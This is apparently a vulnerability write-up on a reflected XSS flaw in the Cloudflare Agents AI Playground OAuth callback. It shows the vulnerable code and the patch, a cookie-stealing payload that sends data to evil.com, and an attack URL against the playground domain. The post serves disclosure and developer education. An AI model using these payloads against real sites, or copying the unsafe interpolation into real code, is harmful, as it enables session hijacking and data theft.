Feb 14, 2026·5 min read·57 visits
Reflected XSS in Cloudflare Agents AI Playground (< 0.3.10) via OAuth callbacks. Developers used `JSON.stringify` inside a `<script>` block, assuming it was safe. It wasn't. Attackers can inject `</script>` to break out and steal chat logs or hijack MCP sessions.
A classic Reflected Cross-Site Scripting (XSS) vulnerability found in the Cloudflare Agents AI Playground. The flaw stems from a misunderstanding of how browsers parse script tags within inline HTML, allowing attackers to break out of a JSON string context and execute arbitrary JavaScript. This exposes sensitive LLM chat history and connected Model Context Protocol (MCP) servers to unauthorized access.
Everyone is rushing to build AI Agents right now. It's the new gold rush. Cloudflare joined the party with their Agents SDK, designed to connect Large Language Models (LLMs) to tools via the Model Context Protocol (MCP). To demonstrate this power, they shipped the AI Playground, a nifty web app where developers can test their agents and OAuth flows.
But here's the thing about OAuth: it's a messy dance of redirects, callbacks, and state parameters. When things go wrong—like a user denying access—the provider kicks the user back to the application with an error message. Ideally, the app handles this gracefully.
In the case of the AI Playground, the developers tried to be helpful. They wanted to pop up an alert box telling you exactly why authentication failed. Unfortunately, in their attempt to be helpful, they handed attackers a loaded gun pointed directly at the user's session. It's a classic tale of "functionality over security" meeting "misunderstood browser mechanics."
The vulnerability lies in a dangerous misconception that has plagued web development for decades: the belief that JSON.stringify() is a security function. It is not.
In the vulnerable code, the application receives an error_description query parameter from the URL. To display this to the user, the server constructs an HTML response containing an inline <script> block. The developer logic went like this: "I'll take the untrusted input, wrap it in JSON.stringify(), and that will escape all the quotes. Therefore, it's safe to drop into a JavaScript variable."
Wrong.
While JSON.stringify() does escape quotes (" becomes \"), it does not escape HTML characters like < or /. When a browser parses HTML, it doesn't care about JavaScript syntax rules until it finishes parsing the tags. If the HTML parser sees the sequence </script>, it immediately closes the script block, regardless of whether that sequence is inside a JavaScript string literal. This behavior, known as "script injection via HTML context," allows an attacker to terminate the developer's script prematurely and start their own.
Let's look at the crime scene in site/ai-playground/src/server.ts. This is the customHandler responsible for processing the OAuth callback.
The Vulnerable Code:
customHandler: (result: MCPClientOAuthResult) => {
// ... success handling omitted ...
// VULNERABLE: result.authError comes from URL query params (?error_description=...)
const safeError = JSON.stringify(result.authError || "Unknown error");
// The injection happens here inside the Template Literal
return new Response(
`<script>alert('Authentication failed: ' + ${safeError}); window.close();</script>`,
{ headers: { "content-type": "text/html" }, status: 200 }
);
}Do you see it? The ${safeError} is injected directly into the HTML string. If safeError contains "</script>", the browser sees this:
<script>alert('Authentication failed: ' + "</script> ...The browser says "Okay, script over!" and dumps the rest of the payload into the DOM as raw HTML. If the attacker follows that closing tag with a new opening <script> tag, they own the execution flow.
Exploiting this is trivial. We just need to craft a URL that closes the developer's script tag and opens our own. The target is the error_description parameter on the callback endpoint.
The Payload:
</script><script>fetch('https://evil.com/steal?c='+document.cookie)</script>The Attack URL:
https://ai-playground.cloudflare.com/callback
?error=access_denied
&error_description=</script><script>alert(document.domain)</script>
&state=VALID_STATEWhen the victim clicks this link (perhaps disguised in a phishing email or a "Try my new AI Agent" button), the server responds with:
<script>alert('Authentication failed: ' + "</script><script>alert(document.domain)</script>"); window.close();</script>Execution Flow:
</script> inside the string. Script 1 Terminated.<script>alert(document.domain)</script>. Script 2 Executed.ai-playground.cloudflare.com.So, we popped an alert box. Who cares? In the context of an AI Playground, the stakes are actually quite high. This isn't just a brochure site; it's a stateful application holding sensitive data.
Cloudflare's fix in version 0.3.10 was simple and effective: they stopped reflecting the error message entirely. Instead of trying to sanitize the input (which is hard to do right in this context without a heavy library), they simply removed the dynamic content from the response.
The Patched Code:
// PATCHED: No more dynamic interpolation
return new Response("<script>window.close();</script>", {
headers: { "content-type": "text/html" },
});If the authentication fails, the window simply closes. The error handling was moved to the parent window or handled via safe state management where React's automatic escaping protects the user.
Lesson for Developers: If you find yourself writing strings into a <script> tag manually, stop. You are almost certainly doing it wrong. Pass data via data attributes, CSP-safe JSON script blocks, or—better yet—don't reflect user input in script contexts at all.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
Cloudflare Agents Cloudflare | < 0.3.10 | 0.3.10 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Reflected Cross-Site Scripting (XSS) |
| CWE ID | CWE-79 |
| CVSS Score | 6.2 (Medium) |
| Attack Vector | Network (Reflected) |
| Exploit Status | PoC Available |
| Impact | Session Hijacking, Data Exfiltration |